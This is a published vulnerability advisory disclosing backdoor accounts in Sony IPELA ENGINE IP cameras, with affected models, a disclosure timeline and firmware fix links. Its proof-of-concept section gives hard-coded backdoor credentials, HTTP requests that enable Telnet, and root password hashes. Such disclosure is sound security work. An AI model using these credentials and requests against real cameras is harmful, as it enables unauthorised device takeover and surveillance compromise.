We have published an accompanying blog post to this technical advisory with
further information:
blog.sec-consult.com/2016/12/backdoor-in-sony-ipela-engine-ip-cameras.html
SEC Consult Vulnerability Lab Security Advisory < 20161206-0 >
=======================================================================
title: Backdoor vulnerability
product: Sony IPELA ENGINE IP Cameras
(multiple products, see Vulnerable / tested versions below)
vulnerable version: see Vulnerable / tested versions below
fixed version: see Vulnerable / tested versions below
CVE number: -
impact: Critical
homepage: pro.sony.com/bbsc/ssr/mkt-security/
found: 2016-10-08
by: Stefan Viehböck (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
=======================================================================
Vendor description:
-------------------
"Sony Professional Solutions (SPS) is a subsidiary of Japanese multinational
technology and media conglomerate Sony with main focus on professional
products. These range from broadcast software and video cameras to providing
Outside Broadcast Units and professional displays."
Source: en.wikipedia.org/wiki/Sony_Professional_Solutions
Business recommendation:
------------------------
Attackers are able to completely takeover the Sony IPELA ENGINE IP Camera
products over the network.
Sony has provided updated firmware which should be installed immediately.
SEC Consult recommends Sony and Sony customers to conduct a thorough
security review of the affected products.
It is essential to restrict access to IP cameras using VLANs, firewalls
etc. Otherwise the risk of being a botnet victim (e.g. Mirai) is high.
Vulnerability overview/description:
-----------------------------------
Sony IPELA ENGINE IP Cameras contain multiple backdoors that, among other
functionality, allow an attacker to enable the Telnet/SSH service for
remote administration over the network.
Other available functionality may have undesired effects to the camera
image quality or other camera functionality.
After enabling Telnet/SSH, another backdoor allows an attacker to gain
access to a Linux shell with root privileges!
The vulnerabilities are exploitable in the default configuration over the
network. Exploitation over the Internet is possible, if the web interface
of the device is exposed.
Proof of concept:
-----------------
The following application-level backdoor accounts exist:
- User debug, Passwort: popeyeConnection
- User primana, Passwort: primana
These accounts are allowed to access specific, undocumented CGI functionality!
Enabling Telnet:
Execute the following HTTP requests. Afterwards the Telnet service is running
(TCP port 23). The following command is for Gen5 products, verified on SNC-DH160:
http:// primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=zKw2hEr9
http:// primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=cPoq2fi4cFk
Note: This request may look a bit different for Gen6 cameras, the string
"himitunokagi" (Japanese, translated: "secret key") is involved in the HTTP request
processing. On Gen6 cameras, a SSH daemon exists and can be enabled as well.
Furthermore an OS-level backdoor exists. This backdoor allows an attacker to
login via Telnet/SSH and access the Linux shell with root privileges!
Below are the password hashes for the OS-level backdoor user:
root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh (Gen5 cameras)
root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh (Gen6 cameras)
Note: The backdoor accounts likely allow an attacker with physical access to
the hardware to login via the serial port as well.
Vulnerable / tested versions:
-----------------------------
This vulnerability was verified on a SNC-DH160 camera with firmware
version V1.82.01 (snc-ch-dh-e-series-eb-em-zb-zm-1-82-01.zip).
The same vulnerabilities were found in firmware for Gen6 cameras
V2.7.0 (snc-g6-series-v2-7-0.zip) during automated firmware analysis with
SEC Technologies IoT Inspector.
According to Sony, at least the following products are affected:
SNC-CH115, SNC-CH120, SNC-CH160, SNC-CH220, SNC-CH260, SNC-DH120,
SNC-DH120T, SNC-DH160, SNC-DH220, SNC-DH220T, SNC-DH260, SNC-EB520,
SNC-EM520, SNC-EM521, SNC-ZB550, SNC-ZM550, SNC-ZM551
SNC-EP550, SNC-EP580, SNC-ER550, SNC-ER550C, SNC-ER580, SNC-ER585,
SNC-ER585H, SNC-ZP550, SNC-ZR550
SNC-EP520, SNC-EP521, SNC-ER520, SNC-ER521, SNC-ER521C
SNC-CX600, SNC-CX600W, SNC-EB600, SNC-EB600B, SNC-EB602R, SNC-EB630,
SNC-EB630B, SNC-EB632R, SNC-EM600, SNC-EM601, SNC-EM602R, SNC-EM602RC,
SNC-EM630, SNC-EM631, SNC-EM632R, SNC-EM632RC, SNC-VB600, SNC-VB600B,
SNC-VB600B5, SNC-VB630, SNC-VB6305, SNC-VB6307, SNC-VB632D, SNC-VB635,
SNC-VM600, SNC-VM600B, SNC-VM600B5, SNC-VM601, SNC-VM601B, SNC-VM602R,
SNC-VM630, SNC-VM6305, SNC-VM6307, SNC-VM631, SNC-VM632R, SNC-WR600,
SNC-WR602, SNC-WR602C, SNC-WR630, SNC-WR632, SNC-WR632C, SNC-XM631,
SNC-XM632, SNC-XM636, SNC-XM637, SNC-VB600L, SNC-VM600L, SNC-XM631L,
SNC-WR602CL
Vendor contact timeline:
------------------------
2016-10-11: Contacting vendor through Sony Prime Support,
asking for product security contact.
2016-10-11: Response from Product Manager - Video Security.
2016-10-14: Vendor sets up secure document exchange.
2016-10-14: Uploading security advisory.
2016-10-14: Vendor confirms receipt of security advisory.
2016-10-24: Asking for update.
2016-11-08: Asking for update again.
2016-11-08: Vendor: advisory information has been sent to HQ Japan,
they are already working on it.
2016-11-28: Sony releases updated firmware and informs SEC Consult.
2016-11-30: Asking Sony additional questions regarding the vulnerability
(no answer).
2016-11-30: Informing CERT-Bund and CERT.at.
2016-12-01: CERT-Bund informs FIRST (Forum of Incident Response and
Security Teams).
2016-12-06: Public release of security advisory.
Solution:
---------
The vendor provided the following URL to download firmware updates for the
affected devices. Updates should be installed immediately:
www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras
The Sony "SNC Tool Box" can be used to confirm the current firmware version and
update the device:
Workaround:
-----------
None available.
Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult
EOF Stefan Viehböck / @2016